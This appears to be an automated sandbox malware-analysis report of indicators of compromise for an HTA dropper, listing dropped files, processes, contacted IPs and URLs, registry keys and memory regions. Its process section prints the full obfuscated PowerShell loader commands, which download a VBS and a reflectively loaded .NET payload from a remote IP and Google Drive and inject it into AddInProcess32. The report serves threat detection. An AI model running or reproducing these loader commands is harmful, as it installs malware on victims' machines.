IOC Report
seethebestthingstobegoodwithhislifebestthigns.hta

loading gif

Files

File Path
Type
Category
Malicious
seethebestthingstobegoodwithhislifebestthigns.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\goodthingswithgreatcomebackwithgreatthigns[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RES35E6.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 10:14:09 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54b0muzo.vqk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5glnbubu.znt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zq4nnja.1hl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ex415s.ozj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmkjxatq.stc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzypzuob.2t3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plh2zfhq.dsq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qi24ypfz.dy2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1ctk0mf.xnh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wexouexv.ms0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
dropped
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.out
Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
modified
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\seethebestthingstobegoodwithhislifebestthigns.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES35E6.tmp" "c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://drive.go
unknown
malicious
https://drive.google.com/uc
unknown
malicious
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
192.3.176.141
malicious
https://drive.google.com
unknown
malicious
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFC
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://www.microsoft.
unknown
http://crl.microY
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
http://www.microsoft.K5
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.usercontent.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
216.58.206.78
drive.usercontent.google.com
142.250.186.129
198.187.3.20.in-addr.arpa
unknown
50.23.12.20.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
192.3.176.141
unknown
United States
malicious
216.58.206.78
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5AB0000
heap
page read and write
6FE0000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
6523000
heap
page read and write
65AC000
heap
page read and write
2CFC000
heap
page read and write
6483000
heap
page read and write
28B8000
trusted library allocation
page read and write
54EE000
stack
page read and write
685A000
stack
page read and write
726E000
stack
page read and write
6F50000
trusted library allocation
page execute and read and write
3600000
heap
page read and write
55FC000
heap
page read and write
4901000
trusted library allocation
page read and write
6523000
heap
page read and write
652C000
heap
page read and write
32A2000
heap
page read and write
661E000
heap
page read and write
5E2F000
stack
page read and write
35EB000
heap
page read and write
7B1E000
stack
page read and write
2F50000
heap
page read and write
6442000
heap
page read and write
65AD000
heap
page read and write
547F000
stack
page read and write
32FF000
stack
page read and write
6613000
heap
page read and write
77C0000
trusted library allocation
page read and write
6DA3000
heap
page read and write
55E5000
heap
page read and write
87F5000
trusted library allocation
page read and write
2D03000
heap
page read and write
56FB000
trusted library allocation
page read and write
6620000
heap
page read and write
296C000
stack
page read and write
34D0000
trusted library allocation
page read and write
750E000
stack
page read and write
2D3F000
heap
page read and write
51EA000
trusted library allocation
page read and write
DE0000
heap
page read and write
2F0E000
stack
page read and write
33E4000
trusted library allocation
page read and write
2CA2000
heap
page read and write
676B000
trusted library allocation
page read and write
6F3E000
stack
page read and write
4D80000
trusted library allocation
page read and write
3412000
trusted library allocation
page read and write
6513000
heap
page read and write
8670000
trusted library allocation
page execute and read and write
6EBE000
stack
page read and write
3615000
heap
page read and write
6513000
heap
page read and write
53FA000
stack
page read and write
6483000
heap
page read and write
738E000
stack
page read and write
7620000
heap
page execute and read and write
7802000
heap
page read and write
75A0000
heap
page read and write
6550000
heap
page read and write
6494000
heap
page read and write
7CA0000
trusted library allocation
page read and write
5648000
heap
page read and write
7C70000
trusted library allocation
page read and write
55D0000
heap
page read and write
61B9000
trusted library allocation
page read and write
70F000
stack
page read and write
2CAE000
heap
page read and write
55EE000
stack
page read and write
7380000
heap
page execute and read and write
3158000
heap
page read and write
591F000
stack
page read and write
6FF0000
trusted library allocation
page read and write
445E000
stack
page read and write
651A000
heap
page read and write
55A0000
heap
page read and write
7C30000
trusted library allocation
page read and write
55F1000
heap
page read and write
568E000
heap
page read and write
441C000
stack
page read and write
8BC0000
trusted library allocation
page read and write
2D93000
heap
page read and write
563D000
heap
page read and write
28A0000
heap
page readonly
86D0000
trusted library allocation
page read and write
72BE000
stack
page read and write
740D000
stack
page read and write
35FE000
heap
page read and write
6141000
trusted library allocation
page read and write
690C000
heap
page read and write
583A000
heap
page read and write
88C7000
heap
page read and write
5CEE000
stack
page read and write
6531000
heap
page read and write
64E9000
heap
page read and write
5478000
trusted library allocation
page read and write
55E7000
heap
page read and write
55B2000
heap
page read and write
35FE000
heap
page read and write
7581000
heap
page read and write
33EF000
stack
page read and write
27E0000
trusted library allocation
page read and write
6542000
heap
page read and write
2CA0000
heap
page read and write
88A1000
heap
page read and write
2C35000
heap
page read and write
3330000
heap
page read and write
6D6B000
heap
page read and write
560C000
heap
page read and write
6DD7000
heap
page read and write
79C3000
heap
page read and write
7C40000
trusted library allocation
page read and write
563B000
heap
page read and write
2D5D000
heap
page read and write
339E000
stack
page read and write
64C3000
heap
page read and write
2CB3000
heap
page read and write
6655000
heap
page read and write
54F5000
heap
page read and write
485E000
stack
page read and write
559E000
stack
page read and write
7B5F000
stack
page read and write
6490000
heap
page read and write
75F0000
heap
page read and write
58C000
heap
page read and write
6550000
heap
page read and write
47D0000
heap
page execute and read and write
3080000
heap
page read and write
6950000
trusted library allocation
page execute
4C14000
heap
page read and write
6FB0000
trusted library allocation
page read and write
62EE000
trusted library allocation
page read and write
553D000
stack
page read and write
3100000
heap
page read and write
6D43000
heap
page read and write
7B10000
heap
page read and write
552B000
trusted library allocation
page read and write
8A61000
trusted library allocation
page read and write
35EC000
heap
page read and write
7BE0000
trusted library allocation
page read and write
72AE000
stack
page read and write
6542000
heap
page read and write
6684000
heap
page read and write
55FE000
heap
page read and write
6499000
heap
page read and write
499F000
stack
page read and write
3127000
heap
page read and write
64E9000
heap
page read and write
75D0000
heap
page read and write
D2B000
stack
page read and write
4743000
trusted library allocation
page execute and read and write
66B1000
trusted library allocation
page read and write
34E0000
heap
page read and write
7730000
trusted library allocation
page read and write
6686000
heap
page read and write
653E000
heap
page read and write
5E6C000
stack
page read and write
35AD000
heap
page read and write
77FE000
stack
page read and write
27C0000
trusted library allocation
page read and write
4A2E000
stack
page read and write
6523000
heap
page read and write
2CB2000
heap
page read and write
559000
heap
page read and write
6523000
heap
page read and write
65B0000
heap
page read and write
1E0000
heap
page read and write
64E9000
heap
page read and write
7C90000
heap
page read and write
6613000
heap
page read and write
28B0000
trusted library allocation
page read and write
648A000
heap
page read and write
7000000
trusted library allocation
page read and write
3604000
heap
page read and write
29AD000
stack
page read and write
6681000
heap
page read and write
64F6000
heap
page read and write
79F3000
heap
page read and write
57D000
heap
page read and write
71EE000
stack
page read and write
55B9000
heap
page read and write
643D000
heap
page read and write
6413000
heap
page read and write
6523000
heap
page read and write
3060000
heap
page read and write
490A000
trusted library allocation
page read and write
527D000
trusted library allocation
page read and write
744A000
stack
page read and write
74CB000
stack
page read and write
648A000
heap
page read and write
550000
heap
page read and write
35ED000
heap
page read and write
6D00000
heap
page read and write
51F9000
trusted library allocation
page read and write
8690000
trusted library allocation
page read and write
63E1000
heap
page read and write
629E000
stack
page read and write
6685000
heap
page read and write
797B000
heap
page read and write
66AC000
trusted library allocation
page read and write
65AF000
heap
page read and write
7C00000
trusted library allocation
page read and write
35AD000
heap
page read and write
569B000
heap
page read and write
79ED000
heap
page read and write
79A5000
heap
page read and write
7ACE000
stack
page read and write
5920000
heap
page read and write
603000
heap
page read and write
7010000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
77BE000
stack
page read and write
7910000
trusted library allocation
page execute and read and write
35F7000
heap
page read and write
3452000
trusted library allocation
page read and write
82AF000
stack
page read and write
661D000
heap
page read and write
2CBA000
heap
page read and write
6544000
heap
page read and write
5600000
heap
page read and write
6523000
heap
page read and write
64BE000
heap
page read and write
63E3000
heap
page read and write
6550000
heap
page read and write
648A000
heap
page read and write
55B1000
heap
page read and write
6900000
trusted library allocation
page read and write
841C000
stack
page read and write
5277000
trusted library allocation
page read and write
2CC7000
heap
page read and write
2C91000
heap
page read and write
6615000
heap
page read and write
87B0000
trusted library allocation
page read and write
4DDE000
stack
page read and write
7A20000
trusted library allocation
page read and write
48C0000
heap
page read and write
3450000
trusted library allocation
page execute and read and write
6485000
heap
page read and write
562E000
heap
page read and write
4C0F000
trusted library allocation
page read and write
5648000
heap
page read and write
4B2F000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7C10000
trusted library allocation
page read and write
73AE000
direct allocation
page read and write
6542000
heap
page read and write
5830000
heap
page read and write
2CE0000
heap
page read and write
35E3000
heap
page read and write
5845000
heap
page read and write
5876000
trusted library allocation
page read and write
2CD0000
heap
page read and write
35EF000
heap
page read and write
4C1F000
heap
page read and write
8240000
trusted library allocation
page read and write
6E10000
trusted library allocation
page read and write
72E0000
direct allocation
page read and write
54E3000
trusted library allocation
page read and write
4D4D000
stack
page read and write
6B4E000
stack
page read and write
560A000
heap
page read and write
4D7E000
stack
page read and write
4B28000
trusted library allocation
page read and write
95F0000
heap
page read and write
E2B000
stack
page read and write
58EC000
trusted library allocation
page read and write
557E000
stack
page read and write
35E6000
heap
page read and write
6651000
heap
page read and write
5648000
heap
page read and write
5685000
heap
page read and write
6544000
heap
page read and write
7C50000
trusted library allocation
page read and write
34BE000
stack
page read and write
5629000
heap
page read and write
528D000
trusted library allocation
page read and write
8420000
heap
page read and write
47B8000
trusted library allocation
page read and write
317A000
heap
page read and write
16C0000
heap
page read and write
7020000
trusted library allocation
page read and write
596E000
stack
page read and write
4D80000
heap
page read and write
6485000
heap
page read and write
361B000
heap
page read and write
2D55000
heap
page read and write
777E000
stack
page read and write
47B0000
trusted library allocation
page read and write
6F9D000
stack
page read and write
5878000
trusted library allocation
page read and write
650B000
heap
page read and write
59B0000
trusted library allocation
page read and write
89EC000
stack
page read and write
4918000
trusted library allocation
page read and write
652A000
heap
page read and write
7360000
direct allocation
page read and write
2CD0000
heap
page read and write
4C10000
heap
page read and write
6613000
heap
page read and write
45DE000
stack
page read and write
6F7D000
stack
page read and write
64F3000
heap
page read and write
2CD0000
heap
page read and write
3440000
heap
page readonly
798D000
heap
page read and write
2CCB000
heap
page read and write
55BE000
heap
page read and write
6542000
heap
page read and write
6D72000
heap
page read and write
27EA000
trusted library allocation
page execute and read and write
76AF000
stack
page read and write
836E000
stack
page read and write
4680000
heap
page execute and read and write
361A000
heap
page read and write
8892000
heap
page read and write
652A000
heap
page read and write
3750000
heap
page read and write
5A8F000
stack
page read and write
6F80000
trusted library allocation
page execute and read and write
48C7000
heap
page read and write
7800000
trusted library allocation
page read and write
465E000
stack
page read and write
28FC000
heap
page read and write
2CA1000
heap
page read and write
7A97000
trusted library allocation
page read and write
71FE000
stack
page read and write
7FD78000
trusted library allocation
page execute and read and write
2F59000
heap
page read and write
70F0000
heap
page read and write
6531000
heap
page read and write
6655000
heap
page read and write
6754000
trusted library allocation
page read and write
451E000
stack
page read and write
73CE000
stack
page read and write
64BC000
heap
page read and write
4F6000
heap
page read and write
2D10000
heap
page read and write
7CD0000
trusted library allocation
page read and write
4D34000
heap
page read and write
5699000
trusted library allocation
page read and write
6620000
heap
page read and write
3619000
heap
page read and write
5621000
trusted library allocation
page read and write
35FE000
heap
page read and write
8220000
trusted library allocation
page execute and read and write
8443000
heap
page read and write
4770000
trusted library allocation
page read and write
569B000
heap
page read and write
7960000
heap
page read and write
7B3E000
stack
page read and write
6F6C000
stack
page read and write
561C000
heap
page read and write
34B8000
trusted library allocation
page read and write
6620000
heap
page read and write
7FD60000
trusted library allocation
page execute and read and write
5AF9000
trusted library allocation
page read and write
64FC000
heap
page read and write
2F6E000
stack
page read and write
79D2000
heap
page read and write
33D0000
trusted library allocation
page read and write
797D000
heap
page read and write
DF0000
heap
page read and write
6550000
heap
page read and write
7790000
trusted library allocation
page read and write
5642000
heap
page read and write
64FC000
heap
page read and write
748A000
stack
page read and write
64C0000
heap
page read and write
12E0000
heap
page read and write
642000
heap
page read and write
64E9000
heap
page read and write
8A22000
trusted library allocation
page read and write
79C0000
heap
page read and write
64B5000
heap
page read and write
7C10000
trusted library allocation
page read and write
4750000
trusted library allocation
page read and write
6550000
heap
page read and write
6523000
heap
page read and write
8250000
trusted library allocation
page read and write
52B4000
trusted library allocation
page read and write
55FE000
heap
page read and write
7A8E000
stack
page read and write
7C40000
trusted library allocation
page read and write
490D000
stack
page read and write
53E000
stack
page read and write
657A000
heap
page read and write
6513000
heap
page read and write
691E000
stack
page read and write
7BD0000
trusted library allocation
page read and write
2CC7000
heap
page read and write
5AD1000
trusted library allocation
page read and write
569B000
heap
page read and write
5640000
heap
page read and write
6B8E000
stack
page read and write
61AB000
trusted library allocation
page read and write
35EA000
heap
page read and write
3400000
trusted library allocation
page read and write
6EFE000
stack
page read and write
652C000
heap
page read and write
6651000
heap
page read and write
8660000
heap
page read and write
3617000
heap
page read and write
650B000
heap
page read and write
6531000
heap
page read and write
6BD0000
heap
page execute and read and write
55F0000
heap
page read and write
5216000
trusted library allocation
page read and write
6757000
trusted library allocation
page read and write
2CB4000
heap
page read and write
2C91000
heap
page read and write
2CEB000
heap
page read and write
7ADF000
stack
page read and write
6655000
heap
page read and write
6487000
heap
page read and write
5410000
heap
page read and write
6C12000
heap
page read and write
6613000
heap
page read and write
73A2000
heap
page read and write
5612000
heap
page read and write
489C000
stack
page read and write
777E000
stack
page read and write
4F0000
heap
page read and write
6490000
heap
page read and write
588E000
stack
page read and write
6DAD000
heap
page read and write
652C000
heap
page read and write
5640000
heap
page read and write
3439000
trusted library allocation
page read and write
79D7000
heap
page read and write
79E8000
heap
page read and write
8A40000
trusted library allocation
page execute and read and write
6487000
heap
page read and write
4E10000
heap
page execute and read and write
64F2000
heap
page read and write
6550000
heap
page read and write
5644000
heap
page read and write
6D82000
heap
page read and write
6513000
heap
page read and write
689C000
stack
page read and write
873F000
stack
page read and write
64FC000
heap
page read and write
695D000
stack
page read and write
64FC000
heap
page read and write
340A000
trusted library allocation
page execute and read and write
868D000
trusted library allocation
page read and write
5691000
trusted library allocation
page read and write
33A0000
heap
page read and write
2C60000
heap
page read and write
